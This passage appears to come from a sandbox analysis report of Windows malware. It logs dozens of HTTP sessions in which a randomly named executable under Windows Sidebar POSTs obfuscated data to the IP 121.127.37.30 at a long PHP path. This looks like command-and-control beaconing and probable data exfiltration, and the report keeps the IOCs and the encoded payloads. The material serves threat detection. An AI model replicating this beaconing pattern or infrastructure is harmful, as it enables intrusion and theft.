                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:11.424819946 CET | 2564 | OUT | Data Raw: 55 53 5a 53 5e 5d 54 5f 5e 5e 51 57 50 59 5a 5b 59 56 58 42 5b 53 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: USZS^]T_^^QWPYZ[YVXB[SRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:>&?%Q7 _>;?/**+^5'>,<8+$%U(!Y""Z))
                                                Dec 5, 2024 16:03:12.394375086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:12.628321886 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:12 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                38 | 192.168.2.7 | 49885 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:13.074640989 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:13.424808025 CET | 2564 | OUT | Data Raw: 50 5e 5a 5b 5b 5c 51 5a 5e 5e 51 57 50 5f 5a 5d 59 53 58 41 5b 53 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: P^Z[[\QZ^^QWP_Z]YSXA[SRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9X*2'?7$^=;]?5$\)*7["/<)17Y(839T+/!Y""Z)1
                                                Dec 5, 2024 16:03:14.396090031 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:14.652307034 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:14 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                39 | 192.168.2.7 | 49887 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:14.886394024 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:15.238333941 CET | 2560 | OUT | Data Raw: 55 55 5a 5d 5b 5f 54 52 5e 5e 51 57 50 5a 5a 5f 59 56 58 40 5b 50 52 59 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: UUZ][_TR^^QWPZZ_YVX@[PRY[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]:+<5'-V#7)+0<%'>67T*"<?8^3%+!Y""Z)=


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                40 | 192.168.2.7 | 49892 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:15.829561949 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:16.174818993 CET | 1452 | OUT | Data Raw: 50 55 5a 5b 5e 58 54 5c 5e 5e 51 57 50 5f 5a 5e 59 50 58 45 5b 55 52 51 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PUZ[^XT\^^QWP_Z^YPXE[URQ[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9*,!0* )<+)Y ?*!++,$-1*/!Y""Z)1
                                                Dec 5, 2024 16:03:17.153656960 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:17.388396025 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:16 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 06 1e 20 58 34 3e 22 5b 20 29 37 52 2e 00 20 5b 33 30 26 41 32 30 2c 12 31 13 13 1c 27 3b 33 55 35 38 24 06 35 39 28 04 23 59 33 11 30 0d 28 46 0c 1d 21 06 33 16 0f 56 2a 39 2c 56 3b 5a 3a 1a 3d 23 0c 59 2e 3e 22 54 3e 20 29 11 3c 00 39 0f 32 2b 34 10 33 03 3a 17 3f 33 05 11 33 35 20 53 00 14 26 0c 2a 08 3d 1e 29 01 29 5d 21 12 3f 0f 28 3b 0f 07 31 38 29 0e 32 37 23 59 32 29 2f 0d 23 09 28 0f 3d 10 25 03 26 5a 38 11 28 23 26 5c 21 05 20 57 00 3d 59 56
                                                Data Ascii: X4>"[ )7R. [30&A20,1';3U58$59(#Y30(F!3V*9,V;Z:=#Y.>"T> )<92+43:?335 S&*=))]!?(;18)27#Y2)/#(=%&Z8(#&\! W=YV


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                41 | 192.168.2.7 | 49893 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:15.968014956 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:16.315506935 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:17.292315006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:17.528772116 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:17 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                42 | 192.168.2.7 | 49899 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:17.816657066 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:18.174834013 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:18.424844980 CET | 1236 | OUT | [request body]
                                                Dec 5, 2024 16:03:19.137427092 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:19.372514009 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:18 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                43 | 192.168.2.7 | 49901 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:19.619981050 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:19.971692085 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:20.958195925 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:21.194737911 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:20 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                44 | 192.168.2.7 | 49907 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:21.584647894 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:21.940454006 CET | 2564 | OUT | [request body]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                45 | 192.168.2.7 | 49912 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:22.514621019 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:22.862322092 CET | 1452 | OUT | [request body]
                                                Dec 5, 2024 16:03:23.845140934 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:24.081031084 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                46 | 192.168.2.7 | 49913 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:22.636398077 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:22.987365961 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:23.961242914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:24.200490952 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:23 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                47 | 192.168.2.7 | 49919 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:24.448065996 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:24.799879074 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:25.772784948 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:26.008744955 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:25 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                48 | 192.168.2.7 | 49921 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:26.266463041 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:26.612371922 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:27.582731009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:27.816467047 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:27 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                49 | 192.168.2.7 | 49926 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:28.057444096 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2560
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:28.409297943 CET | 2560 | OUT | [request body]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                50 | 192.168.2.7 | 49932 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:29.217879057 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 1452
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:29.565673113 CET | 1452 | OUT | [request body]
                                                Dec 5, 2024 16:03:30.543726921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:30.776320934 CET | 380 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Vary: Accept-Encoding
                                                Content-Length: 152
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                51 | 192.168.2.7 | 49933 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:29.338665009 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:29.690486908 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:30.658492088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:30.892529964 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:30 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                52 | 192.168.2.7 | 49939 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:31.135479927 CET | 447 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Dec 5, 2024 16:03:31.487404108 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:32.468111992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:32.700535059 CET | 151 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:32 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                53 | 192.168.2.7 | 49941 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:32.951456070 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:33.310120106 CET | 2564 | OUT | [request body]
                                                Dec 5, 2024 16:03:34.277513981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                Dec 5, 2024 16:03:34.512433052 CET | 207 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 05 Dec 2024 15:03:34 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Content-Length: 4
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 34 56 59 57
                                                Data Ascii: 4VYW


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                54 | 192.168.2.7 | 49946 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 5, 2024 16:03:34.760946035 CET | 471 | OUT | POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                Host: 121.127.37.30
                                                Content-Length: 2564
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                Dec 5, 2024 16:03:35.112457037 CET | 2564 | OUT | Data Raw: 50 53 5a 5b 5b 5f 54 59 5e 5e 51 57 50 5f 5a 50 59 5d 58 41 5b 57 52 5f 5b 5c 43 50 5e 5e 59 57 5a 5e 54 5a 5a 5c 55 59 58 5a 50 59 5a 50 52 41 5f 55 58 5f 5c 5d 5b 5d 57 58 56 50 54 59 5e 40 54 52 5c 5d 50 5f 54 57 43 52 5f 50 42 58 59 56 5b 59
                                                Data Ascii: PSZ[[_TY^^QWP_ZPY]XA[WR_[\CP^^YWZ^TZZ\UYXZPYZPRA_UX_\][]WXVPTY^@TR\]P_TWCR_PBXYV[YVR__X^PUT]ZP_WVUZURQCPT[__Y]Z\U^XXXVTP[HYY[\[U^QPTWRX^^Z^QTF\_^XYXPWZ\ZRAV[Q\_]RYZU[^WQ]UZ_YU^C^ZUY\X]9Y)<2\$,=#48Y>(/+7):;Y6<7=Y(^,^&=9W*/!Y""Z)1


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                55 | 192.168.2.7 | 49952 | 121.127.37.30 | 80 | 7528 | C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                Timestamp | Bytes transferred | Direction | Data
